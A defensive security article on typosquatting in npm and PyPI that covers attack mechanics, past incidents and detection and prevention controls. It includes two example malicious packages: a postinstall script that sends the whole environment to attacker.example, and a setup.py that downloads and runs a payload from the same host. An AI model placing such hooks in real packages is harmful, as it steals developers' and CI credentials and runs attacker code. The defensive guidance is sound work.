Typosquatting in Package Registries: Detection, Prevention, and Runtime Defence

Typosquatting in Package Registries: Detection, Prevention, and Runtime Defence

The Attack Surface

Every package registry is a publicly writable namespace. npm alone hosts over 2.5 million packages. PyPI hosts over 500,000. Any user can register an account without identity verification and publish a package in under five minutes. The barrier between a developer mistyping a dependency name and executing attacker-controlled code on their machine, in their CI runner, and potentially in their production environment is a single character.

Typosquatting exploits this. Attackers register package names that are plausible misspellings, visual lookalikes, or structural variants of popular packages. They rely on the mechanics of fast-moving development workflows: a developer tabs to a terminal, types npm install requst, and the session is compromised before the next command runs. The package installs, runs its postinstall script, exfiltrates credentials, and reports success. The developer sees no error.

This is not a theoretical attack class. It has produced repeated, documented incidents across npm, PyPI, and RubyGems. The controls to address it exist, they compose, and most teams have implemented none of them.

Mechanics of Typosquatting Attacks

Levenshtein Distance Attacks

The most common variant is a simple edit-distance attack. An attacker identifies a high-download-count package — requests, lodash, express, axios — and registers names within one or two edits. Levenshtein distance 1 from requests yields: request (drop the ‘s’, a real package that itself confused users), rquests (swap ‘e’ and missing), requests2, rrequests, requestss. Each is a plausible fat-finger or fast-typist error.

Attackers automate enumeration. A script iterates over the top 1,000 packages by weekly download count, generates all Levenshtein-distance-1 variants, filters for names not yet registered, and publishes malicious packages to each available name. At peak periods in npm’s history, hundreds of squatted packages have been discovered in batch sweeps.

Homoglyph Attacks

Homoglyph attacks substitute visually similar Unicode characters for ASCII characters in package names. Most registries permit Unicode in package names or, where they restrict to ASCII, permit characters that are visually ambiguous in common terminal fonts. eventsтream (with a Cyrillic ‘т’) is visually indistinguishable from event-stream in many typefaces. İo.js (with a dotted capital I) looks like io.js at a glance.

npm’s registry enforces ASCII-only package names, which eliminates the Unicode variant for npm itself. PyPI is more permissive. RubyGems has had inconsistent enforcement. The attack surface varies by registry.

Package Scope Confusion

npm’s scoped package system (@org/package-name) creates its own confusion surface. A package published as @types/lodash (a legitimate types package) is distinct from types-lodash (which could be squatted) and @lodash/types (a plausible-but-fake scoped variant). Attackers register scope-adjacent names: lodash-types, type-lodash, @types-lodash/core.

A related variant is the missing-scope attack: if your project depends on @mycompany/auth as a private package and an attacker publishes a public mycompany-auth to npm, developers who see the dependency name without the scope in documentation or Slack messages may install the wrong package. This overlaps with dependency confusion, but the delivery mechanism is social rather than resolver-based.

Real Incidents

event-stream (npm, 2018)

The event-stream attack is the most studied npm supply chain incident prior to 2024. The package had approximately 1.5 million weekly downloads. Its original maintainer, Dominic Tarr, transferred ownership to a previously unknown npm user named right9ctrl after the new user offered to maintain it. The new maintainer added flatmap-stream as a dependency and injected malicious code into that package.

The malicious code was obfuscated and targeted specifically at developers with the bitpay/copay Bitcoin wallet application in their dependency tree. It decrypted a payload at runtime using a key derived from a description field in the target’s package.json, exfiltrated wallet credentials, and reported to an attacker-controlled endpoint. For all other consumers, the malicious code path was never triggered — which is why it went undetected for over two months.

This was not pure typosquatting — the takeover was social engineering — but the flatmap-stream injection followed typosquatting patterns: a new package, a plausible name, minimal public history, published to amplify reach through a high-traffic dependency. The detection failure was that no automated system checked whether newly added transitive dependencies had any public track record.

ctx and phpass (PyPI, 2022)

In May 2022, a security researcher published a proof-of-concept demonstrating the comprehensiveness of the PyPI typosquatting surface. They registered ctx — a previously abandoned package whose name was identical to a legitimate package that had lapsed — and phpass — a common password hashing utility whose PyPI presence had gone unmaintained. Both packages were squatted with malicious versions that exfiltrated environment variables to a remote endpoint on import.

The environment variable exfiltration is particularly damaging in CI contexts. AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, DATABASE_URL, GITHUB_TOKEN — all of these are standard CI environment variables that an import ctx at the top of a test file would silently ship to an attacker.

The researcher notified PyPI and the packages were removed, but not before establishing how trivially any lapsed package name could be weaponised. PyPI subsequently implemented policies around reusing abandoned package names, but the underlying namespace re-registration problem remains active in lower-traffic portions of the index.

Install-Time Attack Vectors

npm Lifecycle Scripts

npm executes lifecycle scripts at install time. The preinstall, install, and postinstall hooks in a package’s package.json run as shell commands with the same privileges as the user running npm install. For most developer workstations, that is the interactive user’s account. For CI runners, that is whatever service account the runner uses — which commonly has access to deployment credentials, cloud provider tokens, and repository secrets injected as environment variables.

{
  "name": "requst",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "node -e \"require('https').get('https://attacker.example/c?d='+Buffer.from(JSON.stringify(process.env)).toString('base64'));\""
  }
}

This single-line postinstall script exfiltrates the entire environment to an attacker endpoint on every install. It runs synchronously during npm install. The developer sees npm’s standard progress output. Nothing looks wrong.

Binary Downloads in Lifecycle

A more sophisticated variant avoids inline code — which might be caught by signature-based scanners — and uses the lifecycle script to download and execute a binary:

{
  "scripts": {
    "postinstall": "node scripts/install.js"
  }
}

Where scripts/install.js detects the operating system, fetches a platform-appropriate binary from a URL, marks it executable, and runs it. The binary is not present in the package tarball (avoiding static analysis of the tarball content), is downloaded over HTTPS (appearing as legitimate traffic), and executes with the user’s full permissions.

Native add-on packages — those using node-gyp — have a legitimate reason to run compile scripts at install time, which attackers exploit as cover. The pattern of “download a prebuilt binary instead of compiling” is common in legitimate packages (esbuild, puppeteer, playwright), which makes behavioural detection harder.

Python’s setup.py and Build Backends

Python packages using the legacy setup.py format execute arbitrary Python at install time during pip install. Modern packages using pyproject.toml with PEP 517 build backends (hatchling, flit, setuptools) still execute build hooks. A malicious setup.py has the same capability as a malicious npm postinstall script: full filesystem access, network access, environment variable access.

from setuptools import setup
import urllib.request, os

urllib.request.urlretrieve(
    "https://attacker.example/payload",
    "/tmp/.update"
)
os.chmod("/tmp/.update", 0o755)
os.system("/tmp/.update &")

setup(name="reqeusts", version="1.0.0")

Detection Tooling

Socket.dev

Socket analyses packages at the npm and PyPI registry level before they reach your dependency tree. Rather than checking CVE databases (which cannot catch novel malicious packages that have no assigned CVE), Socket performs static behavioural analysis of package code: what APIs does it call, does it use eval or Function constructor, does it make network requests, does it access the filesystem outside its own directory, does it read environment variables.

Socket produces a risk score and categorised signals for each package. The network signal fires when a package makes outbound connections. The environment signal fires when it reads process.env. The eval signal fires on dynamic code execution. These signals are not individually dispositive — axios legitimately makes network requests — but their combination and context (a new package, few downloads, similarity to a popular name) forms a detection surface that catches typosquatters.

Integrate Socket via its GitHub App (blocks PRs that add packages with high risk scores) or the CLI:

npx socket npm install requst

Socket intercepts the install, analyses the target package and its dependencies, and blocks installation if any package exhibits malicious signals — before the package runs on your machine.

GuardDog

GuardDog is an open-source scanner from Datadog that checks packages on npm and PyPI for indicators of malicious behaviour. It combines semantic analysis (code patterns associated with malware) with heuristic checks (package name similarity to popular packages, suspicious metadata).

pip install guarddog

# Scan a single package before installing
guarddog pypi scan requests

# Scan a requirements.txt
guarddog pypi verify requirements.txt

# npm
guarddog npm scan requst

GuardDog’s name similarity check computes Levenshtein distance between the target package name and the top 5,000 most-downloaded packages on the registry. A distance below the configured threshold (default: 2) triggers a POTENTIALLY_COMPROMISED finding. This is the automated equivalent of a human noticing that requst looks wrong.

Run GuardDog in CI as a pre-install gate:

# .github/workflows/dependency-check.yml
- name: GuardDog scan
  run: |
    pip install guarddog
    guarddog npm verify package.json --exit-non-zero-on-finding

OSV-Scanner

OSV-Scanner queries the Open Source Vulnerabilities database for known malicious packages and vulnerabilities in your dependency tree. Unlike GuardDog, it does not perform heuristic analysis of new packages — it checks against a known-bad database. Use it as a complementary layer: GuardDog catches novel typosquats through behavioural heuristics; OSV-Scanner catches packages that have already been reported malicious.

go install github.com/google/osv-scanner/cmd/osv-scanner@latest

osv-scanner --lockfile package-lock.json
osv-scanner --lockfile requirements.txt

OSV-Scanner supports lock files for npm, PyPI, Go modules, Cargo, Maven, and others. Run it against committed lock files rather than node_modules — the lock file is the auditable artifact.

Enforcing Package Allowlists in CI

npm: --ignore-scripts and Lock File Integrity

npm install --ignore-scripts disables all lifecycle scripts during installation. No preinstall, postinstall, or install hooks execute. For most application dependency installs in CI, this is the correct default: your application code does not need packages to compile native add-ons or download binaries during CI. If specific packages require scripts (e.g., esbuild), run them explicitly after the lockfile-verified install.

# CI install: no scripts, exact lockfile
npm ci --ignore-scripts

npm ci (as opposed to npm install) enforces that package-lock.json exists and matches package.json. It will fail if:

  • package-lock.json is absent
  • Any package in node_modules differs from the lockfile
  • The lockfile was generated with a different npm major version (in some configurations)

The integrity field in package-lock.json is a SHA-512 hash of each package tarball. npm ci verifies every package against its recorded hash before extracting it. This does not prevent a malicious package from being added to the lockfile in the first place — but it does prevent the installed packages from diverging from what was reviewed at PR time.

To enforce that the lockfile is never bypassed:

// .npmrc (committed to the repository)
audit=true
fund=false
ignore-scripts=true

With ignore-scripts=true in .npmrc, every developer and CI runner that uses this repository’s npm configuration will install without executing lifecycle scripts.

Package Allowlist with npm

For high-assurance environments, maintain an explicit allowlist of permitted packages. Any dependency not on the allowlist fails the build:

#!/usr/bin/env bash
# scripts/check-packages.sh

ALLOWLIST="allowed-packages.txt"
LOCKFILE="package-lock.json"

jq -r '.packages | keys[] | select(. != "") | ltrimstr("node_modules/") | split("/")[0]' "$LOCKFILE" \
  | sort -u \
  | while read -r pkg; do
      if ! grep -qxF "$pkg" "$ALLOWLIST"; then
        echo "BLOCKED: $pkg is not on the package allowlist" >&2
        exit 1
      fi
    done

This is operationally expensive for large dependency trees but appropriate for critical services or shared build tooling.

PyPI: pip-audit, Requirements Hashing, Private Mirror

pip-audit

pip-audit queries PyPI’s advisory database and the OSV database for vulnerabilities in installed packages. For typosquatting specifically, combine it with GuardDog:

pip install pip-audit
pip-audit -r requirements.txt

Requirements Hashing

pip supports hash-checked installation mode, which verifies that every downloaded package matches a recorded SHA-256 or SHA-512 hash before installation:

# requirements.txt with hashes
requests==2.31.0 \
    --hash=sha256:58cd2187423d77b8d5e82b1a4f692cc47cd2b3ef3fb4a86dcf2f7e8e6d7e2f34 \
    --hash=sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1

Generate the hashes file:

pip install pip-tools
pip-compile --generate-hashes requirements.in -o requirements.txt

Install with hash verification:

pip install --require-hashes -r requirements.txt --no-deps

--no-deps prevents pip from resolving additional transitive dependencies not in the requirements file — any transitive dependency must be explicitly listed with its hash. This is the pip equivalent of npm ci: the exact set of packages and their exact contents are pinned and verified.

Private Mirror as Allowlist

A private PyPI mirror (Nexus Repository, Artifactory, devpi, or AWS CodeArtifact) proxies the public registry and can enforce a package allowlist. Only packages explicitly approved for your organisation are available for install; any package not in the mirror is unavailable regardless of its public PyPI existence.

# pip.conf
[global]
index-url = https://nexus.example.com/repository/pypi-proxy/simple/
trusted-host = nexus.example.com

Configure the mirror to require an approval workflow before proxying new packages. An engineer who needs requst (the typosquat) instead of requests will find it unavailable; the approval workflow gives a human the opportunity to notice the name collision.

Runtime Defence: Blocking Unexpected Network Calls

Network Policy During npm install

The highest-assurance defence against postinstall exfiltration is preventing outbound network connections during package installation entirely. For CI runners on Kubernetes, apply a NetworkPolicy that blocks egress except to the package registry:

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: ci-runner-install-policy
  namespace: ci
spec:
  podSelector:
    matchLabels:
      role: ci-runner
  policyTypes:
    - Egress
  egress:
    - ports:
        - port: 443
      to:
        - ipBlock:
            cidr: 104.16.0.0/12  # Cloudflare (npm registry CDN)

During npm install, outbound connections to any host other than the registry CDN are silently dropped. A postinstall script that attempts to reach attacker.example gets a connection timeout rather than a successful exfiltration. Combine this with --ignore-scripts for defence in depth: even if a script runs (e.g., via a native add-on build), it cannot call home.

Firejail for Local Developer Installs

On developer workstations where Kubernetes network policies are not available, use firejail to sandbox npm install with a network allowlist:

# Allow only registry.npmjs.org during install
firejail \
  --net=eth0 \
  --dns=8.8.8.8 \
  --netfilter="iptables -A OUTPUT -d registry.npmjs.org -j ACCEPT; iptables -A OUTPUT -j DROP" \
  npm install

This is a developer ergonomics trade-off. Some packages (those that download platform binaries in postinstall) will fail under this policy. But it creates a forcing function: packages that require outbound network access during install must be explicitly approved.

Monitoring: Alerting on New Transitive Dependencies

A PR that adds one direct dependency may silently add 30 transitive dependencies. None of them appear in the PR diff. No reviewer examines them. Any one of them could be a typosquat of a popular package pulled in by the new direct dependency.

Automate this check in CI. Compare the set of packages in the post-merge lockfile against the set in the base branch and alert on any new entries:

#!/usr/bin/env bash
# scripts/check-new-deps.sh

BASE_PACKAGES=$(git show origin/main:package-lock.json \
  | jq -r '.packages | keys[] | select(. != "")' | sort)

CURRENT_PACKAGES=$(jq -r '.packages | keys[] | select(. != "")' package-lock.json | sort)

NEW_PACKAGES=$(comm -13 <(echo "$BASE_PACKAGES") <(echo "$CURRENT_PACKAGES"))

if [ -n "$NEW_PACKAGES" ]; then
  echo "New packages introduced by this PR:"
  echo "$NEW_PACKAGES"

  # Run GuardDog against each new package
  while IFS= read -r pkg; do
    pkg_name=$(echo "$pkg" | sed 's|node_modules/||' | cut -d/ -f1)
    guarddog npm scan "$pkg_name" || {
      echo "GuardDog flagged: $pkg_name" >&2
      exit 1
    }
  done <<< "$NEW_PACKAGES"
fi

Integrate this into your PR checks. The check should:

  1. Enumerate all packages in the new lockfile not present in the base branch lockfile
  2. Run GuardDog against each new package name
  3. Run OSV-Scanner against the full lockfile
  4. Post a summary comment to the PR listing new transitive dependencies for human review

This directly addresses the event-stream pattern: a new transitive dependency added by a legitimate direct dependency update would have been caught by automated analysis of the new package’s behaviour signals before the PR merged.

For Python, generate the full dependency tree before and after the change:

# Before (base branch)
pip-compile requirements.in -o /tmp/base-requirements.txt

# After (current branch)
pip-compile requirements.in -o /tmp/pr-requirements.txt

# Diff
diff /tmp/base-requirements.txt /tmp/pr-requirements.txt

Integration with Broader Supply Chain Controls

Typosquatting defence does not stand alone. It is one layer of a supply chain security programme. The other layers are covered in adjacent articles: dependency confusion defence addresses the namespace resolution attack class, and SBOM generation and consumption provides the inventory foundation that makes any dependency monitoring programme auditable.

The combined posture is:

  • Before install: GuardDog name similarity check + Socket.dev behavioural analysis on all new packages in PRs
  • At install: --ignore-scripts to suppress lifecycle execution; hash verification via lockfile (npm ci, --require-hashes)
  • During install: Network policy blocking egress to non-registry hosts
  • After install: OSV-Scanner against the lockfile; new transitive dependency alert with GuardDog scan of each addition
  • Ongoing: Private registry proxy as allowlist; periodic re-scan of full dependency tree as the known-malicious database updates

The operational cost of this stack is low once the CI integration exists. GuardDog and OSV-Scanner run in seconds. The network policy is infrastructure configuration that runs once. The primary cost is the allowlist approval workflow for new packages — which is an explicit, auditable decision rather than an implicit one.

An attacker registering requst on npm is betting that none of these checks are in place. For most repositories, that bet is currently correct.